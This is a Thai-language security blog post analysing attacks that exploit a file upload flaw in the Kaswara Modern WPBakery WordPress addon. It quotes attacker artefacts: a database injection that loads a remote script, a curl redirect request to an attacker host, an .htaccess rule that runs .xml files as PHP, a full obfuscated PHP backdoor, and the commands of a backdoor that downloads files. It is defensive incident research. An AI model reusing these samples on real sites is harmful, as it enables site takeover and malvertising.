ปลั๊กอินเสริมตัวสร้างเพจ Kaswara Modern WPBakery ที่มีช่องโหว่กำลังถูกเอารัดเอาเปรียบในป่า

ย้อนกลับไปเมื่อวันที่ 20 เมษายน 2021 เพื่อนของเราที่ WPScan ได้รายงานช่องโหว่ร้ายแรงใน Kaswara Modern VC Addons หรือที่เรียกว่า Kaswara Modern WPBakery Page Builder Addons ไม่มีให้บริการแล้วที่ Codecanyon/Envato อีกต่อไป ซึ่งหมายความว่าหากคุณใช้งานสิ่งนี้อยู่ คุณต้องเลือกทางเลือกอื่น

ช่องโหว่นี้ทำให้ผู้ใช้ที่ไม่ผ่านการตรวจสอบสิทธิ์สามารถอัปโหลดไฟล์ตามอำเภอใจไปยังไดเร็กทอรีไอคอนของปลั๊กอิน (./wp-content/uploads/kaswara/icons) นี่เป็นตัวบ่งชี้แรกในการประนีประนอม (IOC) ที่เพื่อนของเราที่ WPScan แบ่งปันกับเราในรายงานของพวกเขา

ความสามารถในการอัปโหลดไฟล์ตามอำเภอใจไปยังเว็บไซต์ทำให้ผู้ไม่ประสงค์ดีสามารถควบคุมไซต์ได้อย่างเต็มที่ ซึ่งทำให้ยากต่อการกำหนดเพย์โหลดขั้นสุดท้ายของการติดไวรัสนี้ ดังนั้น เราจะแสดงให้คุณเห็นทุกสิ่งที่เราพบจนถึงตอนนี้ (เรารู้สึกไม่ค่อยสบายใจกับการวิจัย ดังนั้นโปรดข้ามไปที่ส่วน IOC หากคุณไม่ต้องการอ่าน)

การแทรกฐานข้อมูล แอพ Android ปลอม และแบ็คดอร์อื่นๆ

ขอบคุณเพื่อนของเรา Denis Sinegubko จาก Sucuri ที่ชี้ให้เห็นถึงการติดตามการฉีดฐานข้อมูลที่ใช้กับการโจมตีนี้

ผู้ไม่หวังดีจะอัปเดตตัวเลือก 'kaswara-customJS' เพื่อเพิ่มตัวอย่างโค้ด Javascript ที่เป็นอันตรายตามอำเภอใจ นี่คือตัวอย่างหนึ่งที่เราพบ:

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

สตริงที่เข้ารหัส base64 นี้แปลเป็น:

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

และตามปกติจะเกิดขึ้นกับสคริปต์ประเภทนี้ มันจะโหลดชุดของข้อมูลโค้ด Javascript อื่นๆ และเพย์โหลดสุดท้ายจะเป็น Malvertising หรือ Exploit kit ซึ่งคล้ายกับที่ Wordfence รายงานไว้ที่นี่มาก

ในกรณีนี้ สคริปต์กำลังจะตายใน hxxp://double-clickd[.]com/ และไม่โหลดเนื้อหาที่ไม่ดีใดๆ ฉันพบ Javascript ที่น่าสงสัยที่เรียกใช้ไซต์นี้ตั้งแต่ต้นปี 2020 และผู้คนได้บล็อกมันมาตั้งแต่ปี 2018

แอพปลอมอัพโหลดขึ้นเว็บไซต์

แอป Android 40 แอปที่พบในเว็บไซต์ที่เราตรวจสอบนั้นเป็นแอปปลอมในเวอร์ชันต่างๆ เช่น AliPay, PayPal, Correos, DHL และอื่นๆ อีกมากมาย ซึ่งโชคดีที่ผู้ให้บริการ Anti-Virus ยอดนิยมที่สุดตรวจพบตามการวิเคราะห์ VirusTotal นี้

ฉันไม่ได้ตรวจสอบความตั้งใจของแอป แต่การตรวจสอบอย่างรวดเร็วเกี่ยวกับสิทธิ์ที่ขอสามารถทำให้เราเหลือบเห็นว่าแอปนี้ทำอะไรได้บ้าง:

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• android.permission.INTERNET
• android.permission.SEND_SMS
• android.permission.CALL_PHONE
• android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

ไฟล์เหล่านั้นไม่ได้ถูกอัพโหลดทันทีโดยใช้ช่องโหว่ของ Kaswara หลังจากที่ไซต์ถูกบุกรุก ผู้โจมตีจะอัปโหลดเครื่องมืออื่นๆ ก่อนเพื่อควบคุมไซต์อย่างสมบูรณ์

ไฟล์ที่อัพโหลด

นอกจากนี้ยังพบแบ็คดอร์และมัลแวร์อื่นๆ บนเว็บไซต์ที่ถูกบุกรุกจากช่องโหว่นี้ ฉันจะแบ่งปันการวิเคราะห์อย่างรวดเร็วของสิ่งที่ได้รับความนิยมและน่าสนใจที่สุดในโพสต์นี้ อย่างไรก็ตาม ฉันต้องการเน้นที่สิ่งที่ซับซ้อนที่สุดก่อน

แอพเปลี่ยนเส้นทางและปลอม

แอปปลอมที่ฉันพบในไซต์ที่ถูกบุกรุกหลายแห่งไม่ได้ถูกอัปโหลดโดยใช้ประโยชน์จากช่องโหว่ของ Kaswara พวกเขากำลังอัปโหลดไปยังไซต์โดยใช้เครื่องมือแฮ็กแบบมัลติฟังก์ชั่น ซึ่งช่วยให้ผู้โจมตีสามารถอัปโหลดโค้ดระยะไกลบางส่วน (โดยระบุ URL หรือสตริง) และเปลี่ยนเส้นทางผู้ใช้ไปยังไซต์ที่เป็นอันตราย

สามารถระบุไฟล์ได้อย่างง่ายดายโดยการมีสตริงนี้: base64_decode('MTIz');error_reporting(0); การทำงาน

น่าสนใจพอที่จะสุ่มทุกอย่างอื่นยกเว้นนี้

มัลแวร์อยู่ในบรรทัดเดียว ซึ่งเป็น IOC ที่น่าสนใจเช่นกัน หากคุณกำลังมองหาความผิดปกติของโค้ดประเภทนี้

เพื่อให้เข้าใจง่ายขึ้น ฉันถอดรหัสส่วนใหญ่ของโค้ด เปลี่ยนชื่อฟังก์ชันที่น่าสนใจ และปรับปรุงโค้ดให้สวยงาม มัลแวร์มี 6 ฟังก์ชันที่แตกต่างกัน และ 5 ฟังก์ชันจะขึ้นอยู่กับค่าที่ส่งผ่านตัวแปร $_GET['ts'] สำหรับเอกสารนี้ ให้ลองพิจารณาหนึ่งในหลายๆ กรณีที่ฉันพบ: c.php

/c.php?ts=kt

การดำเนินการนี้ไม่ช่วยอะไรและจะบังคับให้ไซต์ส่งคืนข้อผิดพลาด 500 (ในโค้ดในภายหลัง)

/c.php?ts=1

เปลี่ยนค่าแฟ $q1a เป็น true เพื่อดำเนินการตรวจสอบโค้ดและส่งข้อความตกลงไปยังผู้โจมตี

ในกรณีนี้ ไซต์ระยะไกลจะตอบ: {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php?ts=sv&v=”รหัส”&p=40bd001563085fc35165329ea1ff5c5ecbdbbeef

เขียนไฟล์บนเซิร์ฟเวอร์ด้วยรหัสที่มาจากเนื้อหาของ $_GET["v"] ตราบใดที่ $_GET["p"] เป็นเช็คซัม SHA1 ที่ 123 (โปรดจำไว้ว่า IOC แรกของ base64_decode('MTIz') นี้ คือเช็คซัม)

/c.php?ts=tt

เขียน 5 MB ของ “-” บนเซิร์ฟเวอร์ อาจใช้เพื่อทดสอบว่าฟังก์ชั่นอัพโหลดจะทำงานบนเซิร์ฟเวอร์หรือไม่

/c.php?ts=dwm&h=HASH1,HASH2

เมื่อมัลแวร์ได้รับคำขอนี้ จะทำการทดสอบเพื่อตรวจสอบว่าไฟล์ที่อัปโหลดถูกเขียนไปยังเซิร์ฟเวอร์สำเร็จหรือไม่ ต้องทราบแฮช MD5 ของพวกเขาและถูกส่งไปยังตัวแปร $_GET['h'] เป็นค่าที่คั่นด้วยเครื่องหมายจุลภาค

/c.php?ts=dw&h=hash&l=URLs_as_CSV

ดาวน์โหลดไฟล์จากชุดของเว็บไซต์บุคคลที่สามและบันทึกไว้บนเซิร์ฟเวอร์โดยตั้งชื่อตามอักขระ 12 ตัวสุดท้ายของ md5 ของไฟล์ที่ดาวน์โหลด

นี่คือฟังก์ชันที่ใช้ในการอัปโหลดแอปปลอมไปยังเซิร์ฟเวอร์

ต่อไปนี้คือตัวอย่างคำขอดาวน์โหลดไฟล์ที่เป็น /c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697

กำลังเปลี่ยนเส้นทางการเข้าถึง

หากเลือกตัวเลือก kt หรือไม่ได้เลือกตัวเลือก โค้ดจะดำเนินการเปลี่ยนเส้นทาง ซึ่งทำได้โดยการร้องขอ JSON blob พร้อมข้อมูลที่จำเป็น จากนั้นดำเนินการเปลี่ยนเส้นทางผู้เยี่ยมชมโดยใช้ฟังก์ชันส่วนหัว

คำตอบจะเป็นดังนี้: {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

ฟังก์ชันเพื่อดำเนินการคำขอ cURL ด้วยพารามิเตอร์ที่จำเป็นคือฟังก์ชันนี้: ไม่มีอะไรแฟนซี...

และสามารถแปลเป็นคำขอ cURL นี้:

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

URL สุดท้ายคือ เท่าที่ฉันสามารถทดสอบ สุ่ม แต่มีลักษณะเหมือนกันของการเป็นเพจปลอมสำหรับบริการหรือแอปยอดนิยม

wp-content/uploads/kaswara/icons/16/javas.xml และ wp-content/uploads/kaswara/icons/16/.htaccess

โดยปกติ ไฟล์ XML จะไม่ถูกทำเครื่องหมายว่าเป็นภัยคุกคาม แต่ในกรณีนี้ เรามีไฟล์ .htaccess ที่สร้างขึ้นมาเป็นพิเศษ ซึ่งจะเปลี่ยนแปลงวิธีที่เว็บเซิร์ฟเวอร์มองเห็น:

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

อันที่จริง มันบอกให้ Apache เข้าใจไฟล์ javas, homes หรือ menus ที่มี xml, php หรือ pdf เป็นไฟล์ PHP ที่จะถูกประมวลผลและดำเนินการตามนั้น ดังนั้น ไฟล์ใดๆ ที่อยู่ในโครงสร้างไดเร็กทอรีเดียวกันกับ .htaccess นี้จะน่าสงสัย

ไฟล์ javas.xml เหมือนกับไฟล์ที่เป็นอันตรายอื่นๆ ที่อัปโหลดไปยังไซต์ ฉันพบว่าความแตกต่างคือบางบรรทัดมีบรรทัดว่างหนึ่งหรือสองบรรทัดที่ส่วนท้ายของไฟล์ ซึ่งทำให้การแฮชแบบเดิมยากขึ้นเล็กน้อย

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

โค้ดที่เป็นอันตรายถูกทำให้สับสนโดยใช้สตริงที่เข้ารหัส str_rot13 และ base64 นอกจากนี้ยังใช้ค่าเลขฐานสิบหกและการดำเนินการทางคณิตศาสตร์เพื่อซ่อนสตริงเพิ่มเติมอีกเล็กน้อย เพย์โหลดสุดท้ายไม่เป็นที่รู้จัก เนื่องจากจะสร้างฟังก์ชันตามค่าของคำขอ POST อย่างไรก็ตาม ดูเหมือนว่าเพย์โหลดจะเหมือนกันทุกครั้ง เนื่องจากต้องอาศัยการตรวจสอบ md5 ก่อนสร้าง (c42ea979ed982c02632430e9e98a66d6 เป็นแฮช md5)

บทสรุป

เนื่องจากนี่เป็นแคมเปญที่ใช้งานอยู่ ในขณะที่เขียนโพสต์นี้ เราพบตัวอย่างมัลแวร์ต่างๆ จำนวนมากขึ้นเรื่อยๆ ที่ถูกทิ้งลงในไซต์ที่ได้รับผลกระทบ บางอันเป็นเพียงรูปแบบต่าง ๆ ของสิ่งที่เรามีในขณะที่บางอันก็น่าสนใจเพียงพอสำหรับการวิเคราะห์เชิงลึก มองหาโพสต์เล็กๆ เร็วๆ นี้เพื่อสำรวจตัวอย่างอื่นๆ เหล่านี้

สิ่งนี้แสดงให้เห็นถึงความสำคัญของการอัปเดตส่วนขยายของคุณด้วยการแก้ไขความปลอดภัยล่าสุด หากนักพัฒนาไม่เผยแพร่การแก้ไขในเวลาที่เหมาะสมหรือถูกลบออกจากที่เก็บ WordPress.org (หรือตลาดอื่น ๆ ) เราขอแนะนำให้คุณหาทางเลือกที่ปลอดภัยกว่า

หากคุณกังวลเกี่ยวกับมัลแวร์และช่องโหว่สำหรับไซต์ของคุณ ให้ตรวจสอบคุณสมบัติความปลอดภัยของ Jetpack Jetpack Security มอบการรักษาความปลอดภัยไซต์ WordPress ที่ครอบคลุมและใช้งานง่าย รวมถึงการสำรองข้อมูล การสแกนมัลแวร์ และการป้องกันสแปม

ตัวชี้วัดการประนีประนอม

คุณจะพบรายชื่อ IOC ทั้งหมดที่เราระบุได้ที่นี่: